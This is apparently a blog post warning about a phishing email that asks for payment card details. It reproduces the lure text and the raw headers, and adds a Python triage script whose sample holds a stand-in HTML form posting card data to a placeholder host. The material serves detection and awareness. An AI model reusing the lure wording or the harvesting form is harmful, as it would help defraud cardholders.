
A well-made, dangerous phishing email designed to harvest sensitive payment card data landed in my inbox.

The email looks as if it was sent from a seemingly trustworthy address at the creditcard.com site.

Fortunately for a large share of the people potentially at risk, the email is in English.

Irregular activity on your Credit Card

Dear Credit Card Customer,

We have detected irregular activity on your Credit Card on November 11, 2011.
As the Primary Contact, you must verify your account activity before you can continue using
your card, and upon verification, we will remove any restrictions placed on your account.

To review your account as soon as possible please download
the attached form and follow the instructions on your screen.

We appreciate your business and the opportunity to serve you.
Please do not reply to this e-mail as this is only a notification. Mail sent to this address cannot be answered.

See the screenshot:

The email includes the expected logos: Visa, MasterCard, Maestro.

Below the email is a link to a form with a safe-sounding name: Secured_Online_Verification_Form.html

The form is hosted at Google.com.

If anyone is interested in the email headers, the original in raw form is here:

Delivered-To: **********@gmail.com
Received: by 10.231.211.2 with SMTP id gm2cs42479ibb;
Thu, 2 Feb 2012 02:10:30 -0800 (PST)
Received: by 10.236.197.6 with SMTP id s6mr2693457yhn.68.1328177429661;
Thu, 02 Feb 2012 02:10:29 -0800 (PST)
Return-Path: <vsmc@creditcard.com>
Received: from funkenstien.fmlive.net (ns2.fmlive.net. [66.7.201.125])
by mx.google.com with ESMTPS id e6si1902644yhk.65.2012.02.02.02.10.29
(version=TLSv1/SSLv3 cipher=OTHER);
Thu, 02 Feb 2012 02:10:29 -0800 (PST)
Received-SPF: neutral (google.com: 66.7.201.125 is neither permitted nor denied by best guess record for domain of vsmc@creditcard.com) client-ip=66.7.201.125;
Authentication-Results: mx.google.com; spf=neutral (google.com: 66.7.201.125 is neither permitted nor denied by best guess record for domain of vsmc@creditcard.com) smtp.mail=vsmc@creditcard.com
Received: from 74-92-64-45-philadelphia.hfc.comcastbusiness.net ([74.92.64.45]:37579 helo=creditcard.com)
by funkenstien.fmlive.net with esmtpa (Exim 4.69)
(envelope-from <vsmc@creditcard.com>)
id 1ROxJT-0000Uz-UW
for peeeetr@gmail.com; Fri, 11 Nov 2011 12:03:00 -0800
From: Credit Card Issues <vsmc@creditcard.com>
To: peeeetr@gmail.com
Subject: Irregular activity on your Credit Card
Date: 11 Nov 2011 15:07:32 -0500
Message-ID: <20111111150732.794D9DA6EFAC620F@creditcard.com>
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_NextPart_000_0012_B1853F78.94E260BA"
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - funkenstien.fmlive.net
X-AntiAbuse: Original Domain - gmail.com
X-AntiAbuse: Originator/Caller UID/GID - [47 12] / [47 12]
X-AntiAbuse: Sender Address Domain - creditcard.com
X-Source:
X-Source-Args:
X-Source-Dir:
This is a multi-part message in MIME format.
------=_NextPart_000_0012_B1853F78.94E260BA
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
<div id=3D"Secure your Credit Card">
<td align=3D"center">  <img src=3D"http://www.efts.ro/images/media/diver=
se/visa_mastercard.gif" alt=3D"Secure your Credit Card" /></td>
<br>
Dear Credit Card Customer,<br><br>
We have detected irregular activity on your Credit Card on November 11, 2011=
=2E<br>
As the Primary Contact, you must verify your account activity before you can=
continue using<br>
your card, and upon verification, we will remove any restrictions placed on =
your account.<br>
<br><br>
To review your account as soon as possible please download<br>
the attached form and follow the instructions on your screen.<br>
<br><br>
We appreciate your business and the opportunity to serve you.<br>
Please do not reply to this e-mail as this is only a notification. Mail sent=
to this address cannot be answered.
------=_NextPart_000_0012_B1853F78.94E260BA
Content-Type: application/octet-stream; name="Secured_Online_Verification_Form.html"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="Secured_Online_Verification_Form.html"
------=_NextPart_000_0012_B1853F78.94E260BA--
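
The anomalies visible in the raw message above (an SPF result of neutral, a HELO of creditcard.com announced by a Comcast business host, and an .html attachment) can be checked mechanically during mail triage. The Python below is an added example, not part of the original post; its sample message is constructed from a trimmed copy of the headers above, and the attachment body and the host collector.example are placeholders.

```python
import email
import re
from email import policy

# Constructed sample: headers trimmed from the raw message above. The attachment body
# is an unencoded stand-in (collector.example is a placeholder host).
SAMPLE = b"""\
Return-Path: <vsmc@creditcard.com>
Authentication-Results: mx.google.com; spf=neutral smtp.mail=vsmc@creditcard.com
Received: from 74-92-64-45-philadelphia.hfc.comcastbusiness.net ([74.92.64.45]:37579 helo=creditcard.com)
\tby funkenstien.fmlive.net with esmtpa (Exim 4.69)
From: Credit Card Issues <vsmc@creditcard.com>
Subject: Irregular activity on your Credit Card
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/html; charset="iso-8859-1"

Please download the attached form.
--b1
Content-Type: application/octet-stream; name="Secured_Online_Verification_Form.html"
Content-Disposition: attachment; filename="Secured_Online_Verification_Form.html"

<form action="http://collector.example/post.php" method="post"><input name="cc"></form>
--b1--
"""

def triage(raw: bytes) -> list[str]:
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings = []
    # 1. SPF: any result other than "pass" means the sending IP is not vouched for.
    spf = re.search(r"\bspf=(\w+)", str(msg.get("Authentication-Results", "")))
    if not spf or spf.group(1).lower() != "pass":
        findings.append("spf=" + (spf.group(1).lower() if spf else "missing"))
    # 2. HELO claims the From: domain, but the connecting host is not in that domain.
    dom = msg["From"].addresses[0].domain.lower()
    for rcv in msg.get_all("Received", []):
        m = re.search(r"from\s+(\S+)\s.*?helo=(\S+?)\)", str(rcv), re.S)
        if m and m.group(2).lower() == dom:
            host = m.group(1).lower()
            if host != dom and not host.endswith("." + dom):
                findings.append("helo-mismatch:" + host)
    # 3. HTML attachment whose form posts to a remote host (base64 is decoded too).
    for part in msg.iter_attachments():
        if (part.get_filename() or "").lower().endswith((".html", ".htm")):
            body = part.get_payload(decode=True).decode("latin-1", "replace")
            pat = r'<form[^>]*\baction=["\']?https?://([^/"\'\s>]+)'
            findings += ["html-form-posts-to:" + h for h in re.findall(pat, body, re.I)]
    return findings
```

Calling triage(SAMPLE) returns one finding per check; a message that passes SPF, has no HELO mismatch and carries no HTML form attachment returns an empty list.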


5th Dec 2011

One Response to “Email phishing for payment card data”

  1. Pavel wrote:

    Nicely and credibly made phishing, you have to give it that.
